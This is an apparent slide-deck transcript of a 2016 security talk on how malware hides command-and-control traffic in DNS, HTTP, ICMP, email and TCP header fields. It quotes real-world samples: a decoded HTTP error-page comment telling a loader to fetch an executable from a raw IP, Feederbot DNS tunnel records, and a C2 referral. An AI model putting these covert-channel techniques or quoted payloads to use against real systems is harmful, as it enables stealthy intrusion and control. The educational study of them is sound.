Malware Command and Control: Evasion Tactics and Techniques
Malware is designed to perform malicious actions without catching attention of the user. Malware Authors keep on developing new ideas to stay undetected by security technologies. In order to remain undetected, communication channels between attacker and malware needs to be stealthy and evolving. Making Command and control with attacker to receive on demand commands is an essential phase of the Cyber Kill Chain.
As a result, we are observing continuous advancement into communication channel for Malware Command and control.
In this session, we will try to cover some of the advanced techniques used by Malwares nowadays to communicate with it's command and control.
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
1. MALWARE COMMAND AND CONTROL:
EVASION TACTICS AND TECHNIQUES
Avkash Kathiriya
Information Security Learner
Dhawal Shah
Information Security Learner
2. AGENDA
• CKC (Cyber Kill Chain) Revision
• What is Command and control?
• What is Malware CnC?
• Why CnC?
• Channels of CnC
• Some Advance CnC
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 2
3. ./Shell> Cyber Kill Chain revision
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 3
4. Our focus on this
session will be
Command and
Control 6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 4
5. What is Command
and Control??
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 5
6. C: Command and Control > CnC.txt
Command
Control
&
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 6
7. C: Command and Control > CnC.txt
Command
Control
Idea is to give command
to control your systems
and accomplish your aim
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 7
8. What is Malware CnC?
Compromised system
Command and control
server
Command
Command
Response
Response
Attacker
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 8
12. 6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 12
Evolution of CNC Techniques
Mostly IRC based malwares Rapid evolution of CNC techniques
P2P DNS HTTP
Domain
Flux
Tunnelling
14. Answer is to stay
undetected = Need
of covert
communication
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 14
15. Covert communication?
• Capability to transfer information between two hosts, which are not explicitly allowed to
communicate.
• a mechanism for sending and receiving information data between machines without
alerting any firewalls and IDSs on the network.
• You want to communicate with someone without being observed
• Cryptography/Encryption is not good enough
– You want to hide the fact you are communicating at all
– Best way is to hide the communication in innocuous-looking network traffic or data
– Firewall must let the traffic pass through
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 15
16. Covert communication?
DNS Requests
DNS Reply
Malicious DNS
Requests
Malicious DNS
Reply
It’s a method of
performing malicious
communication with the
legitimate and basic
channels which you can
not block at perimeter
level e.g. DNS in this case
Internal
Network
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 16
24. Web CnC?
• Direct connection to Internet on port 80
• Which will be blocked in most of the cases
• Identify Proxy being used and divert Web Cnc
to proxy
• Proxy needs authentication which malware anyway
can get it
• Reverse WWW shell
• Looks ordinary http request on firewall to servers
• Server sends back html resources interpreted as
shell command
• Eg. GoToMyPC
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 24
25. Advance Web CnC?
• Using HTTP GET and POST for communication
• HTTP Tunneling
• Downloading Information in favicon.ico
Extract info using LSB Stagno
Decrypt info using RC4
favicon.ico
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 25
29. Advance Web CnC?
• Youtube as a malware CnC
Attacker
Endpoint
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 29
30. Advance Web CnC?
• HTTP Error messages
HTTP/1.1 404 Not Found
Date: Mon, 9 Jul 2015 06:13:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding,User-Agent
Content-Length: 357
Connection: close
Content-Type: text/html; charset=utf8
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not
Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /XXX/YYY.php was not
found on this server.<P><HR><ADDRESS></ADDRESS></BODY></HTML><!-- DEBUG:
MTQyODUyMTUyMzcyOTk5MyNsb2FkZXIgaHR0cDovLzExMS4xNzkuMzkuODMvZ29sZGVuMy5
leGUjMTQyOD
UxMjA2MTc1NDYzNSNyYXRlIDYwIwDEBUG-->
=============================================================================
Decoded Value:
1428521523729993#loader http://111.179.39.83/golden3.exe#1428512061754635#rate 60#
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 30
31. Hiding commands in HTTP messages
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 31
33. Email CnC?
• It’s pretty simple just use SMTP channel for
sending and receiving commands from your
controller
Endpoint
Email
Attacker
Sending command
through SMTP
Receiving response
through SMTP
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 33
Evasion techniques seen in
this type of communication is
use of
Power shell
35. Network CnC?
Types of covert channel communication @ network layer
• Storage Channels
– Hide data within unused TCP/IP packet header fields
• TCP Flags field, TCP ISN, etc.
• Timing channels
– Modulate system resources in such a way that a receiver can
observe and decode it
– Port Knocking, varying packet rates, etc.
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 35
36. Network CnC?
• Protocol Tunneling:
– Protocol that carries data from another protocol.
– Example: SSH
– SSH allows to set up a secure connection between two
computers.
– Can use this connection for insecure protocols such as ftp.
• Tunnel through any TCP / IP traffic
– Insert data in unused or misused fields in the protocol header of
packets, such as:
– IP Identification.
– TCP sequence number.
– TCP acknowledgment number.
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 36
37. Network CnC?
• Hiding information on existing protocols such as HTTP,
DNS, and ICMP
• Pros/Cons with each protocol
– HTTP good for large data transfer, but more conspicuous
– DNS not great for data transfer, but good for C&C
– ICMP is good for C&C but is often blocked
• Author of The Rootkit Arsenal
proposes writing your own TCP/IP
stack using MS Windows NDIS
• BitTorrent Tracker protocol
tunneling
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 37
38. Network CnC?
Example: LOKI
Attacker install Loki server (a.k.a. LokiD) on victim.
Attacker runs Loki client on his own machine.
Loki tunnels attackers commands:
Attacker writes shell commands.
Loki client sends out several ICMP packets to victim that
contain part of the commands.
Loki server receives ICMP packets and extracts attacker
command.
Loki server executes them.
Reversely, Loki server wraps responses in ICMP messages,
sends them to the Loki client, which displays them.
Port scanners or netstat cannot detect Loki since ICMP does not
use ports.
Only traces are the Loki server running as root and ICMP
messages going back and forth.
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 38
39. Network CnC?
• ICMP Covert Tunnels
• Mechanism
• Use of Ping request /response
• Tool: Ptunnel ((http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-
0.71.tar.gz))
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 39
40. ICMP Covert Tunnels
• Mechanism of ptunnel tool
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 40
41. ICMP Covert Tunnels
• Wireshark capture of ptunnel tool
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 41
42. DNS Covert Tunnels
Mechanism of DNS Covert Channel - Feederbot
Normal:
;QUESTION
newcommunitybank.com. IN A
;ANSWER
newcommunitybank.com. 86400 IN A 74.54.82.153
===========================================================================
Malicious:
;QUESTION
f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. IN ANY
;ANSWER
f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. 0 IN TXT
"aYpYOb/6L5NRMxDRbwQDrVfPJDw5yogih+zlfj+lQpRDPZE4n1DWB0M/l0J6YDp88Vgm"
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 42
43. DNS Covert Tunnels
Mechanism of DNS Covert Channel - Feederbot
• 50-char system-dependent bot ID:
f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4
• RC4-encrypted bootstrap traffic
0000 8E 68 00 00 0B 00 00 00 17 00 00 00 39 34 2E 32 .h..........94.2
0010 33 2E 36 2E 36 37 00 69 6D 61 67 65 73 2E 6D 6F 3.6.67.images.mo
0020 76 69 65 64 79 65 61 72 2E 6E 65 74 2E 00 3C viedyear.net..<
• Contains a referral to the next C2 server node 94.23.6.67
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 43
44. DNS Covert Tunnels
• Tool: OzymanDNS
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 44
45. DNS Covert Tunnels
• WireShark Capture of OzymanDNS
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 45
46. DNS Covert Tunnels
• Packet Capture of OzymanDNS
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 46
49. Endpoint CnC??
Endpoint USB
Not actual CnC, but methods of infection and communication was USB in this case.
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 49
50. Conclusion
• CnC is key for any malware to sustain it’s
footprint
• Techniques and tactics to evade the CnC channel
has evolved from time to time
• Idea is to hide in the mass and exploit the flows
in traditional communication channels
• Attackers stay connected with there target and
keep on nurturing the malwares planted
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 50
51. References
• Lockheed Martin Cyber Kill Chain
• SANS Institute – Covert channels
• Introduction to malicious code – Erland Jonsson
• Black hat EU15 – Hiding In Plain Sight
6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 51
52. 6/11/2016MALWARE CNC BY AVKASH K & DHAWAL SHAH 52
• Twitter : @avkashk
• Blog: www.avkashk.wordpress.com or LinkedIn Pulse (Avkash Kathiriya)
• Email : avkashk@null.co.in
• Twitter:@shahdhawal
• Email: shah.dhawal.s@gmail.com